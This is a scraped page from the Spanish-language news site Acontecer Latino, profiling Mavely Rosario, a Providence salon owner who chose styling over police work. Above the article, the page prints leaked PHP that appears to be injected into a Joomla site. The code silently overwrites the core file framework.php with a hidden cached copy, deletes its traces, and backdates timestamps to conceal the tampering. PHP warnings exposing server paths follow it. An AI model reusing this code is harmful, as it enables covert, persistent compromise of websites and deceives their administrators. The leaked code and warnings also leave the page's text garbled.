$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 426
Mavely Rosario: Entre su pasión por la belleza y el sueño de ser policía

ACONTECER LATINO

Tuesday, Sep 19th

Ultima actualizacion:06:42:24 AM GMT

Estas en: PRIMERA PLANA

Mavely Rosario: Entre su pasión por la belleza y el sueño de ser policía

Imprimir PDF

alt

PROVIDENCE, RI.- Como si se tratase de un debate, entre vocación y profesión, en dos áreas que distan mucho de alguna semejanza, así estuvo Mavely Rosario, propietaria de Mave’s Empire Beauty Salon, tratando de decidirse entre ser Estilista o ejercer la carrera de Justicia Criminal, ganando la batalla el amor y pasión que desde niña vibraba en su interior por el mundo de la belleza.

Después de 11 años de arduo trabajo, siete de ellos en la ciudad de Providence, Mavely, de nacionalidad dominicana, y con tan solo 26 años de edad, se lanza con todo y abre las puertas de su propio centro de belleza, Mave’s Empire Beauty Salon, sin pensarlo dos veces yuan cuando afirma que su “dream job” (el trabajo de sus sueños) era ser policía.

La joven empresaria recuerda que luego de recibir el entrenamiento requerido en el Departamento Policía de Providence, y tras comprobar los grandes riesgos que enfrentaría ejerciendo esta profesión, desistió de la idea y se convenció así misma que su verdadera vocación era ser estilista y dedicarse al mundo de la belleza.

Este sería el primer paso para dar riendas sueltas a su talento y decir “sí se puede”, enrolándose entonces en el mundo de los negocios como propietaria de su propio salón de belleza.

Hoy a cinco meses de la apertura de Mave’s Empire Beauty Salon en el 433 Potter Avenue, en Providence, Mavely dice sentirse bendecida por el “Divino Creador”, por la rapidez con que el centro de belleza ha calado en el gusto de una clientela que crece a medida que su fama y a la de su equipo de estilistas se propaga en Providence y otras ciudades.

"Mave's Empire Beauty Salón es mi verdadera bendición, pues cuento con un excelente equipo de trabajo, son chicas profesionales en lo que hacen y gracias a su trabajo dejan satisfechos a los clientes que son quienes hacen realidad este negocio", significó Mavely Rosario.

Enumeró entre los servicios especializados del centro de belleza: aplicación de químicos, extensiones de pelo, corte y secado, trenzas, masajes reductores y relajantes, pedicura y manicura, faciales y depilaciones.

Retos y dificultades

Dejar su país de origen con el firme propósito de encontrar un mejor porvenir y luchar para lograr sus metas, sola, en un país extraño, representó para la joven empresaria dominicana su mayor dificultad.

Sin embargo, esas vicisitudes han sido superadas por el reto de convertirse en lo que es hoy día, la dueña de Mave's Empire Beauty Salon.

Y con la experiencia que, a pesar de su corta edad, ha acumulado, Mavely Rosario exhorta a todos esos jóvenes que tienen sueños por cumplir en este país, a lanzarse sin temor y arriesgarse porque mientras hay vida todo se puede lograr. “Todo lo podemos lograr pero con esfuerzo y esmero porque el futuro es de la juventud y el triunfo es de quien estudia, trabaja y aprende productivamente”.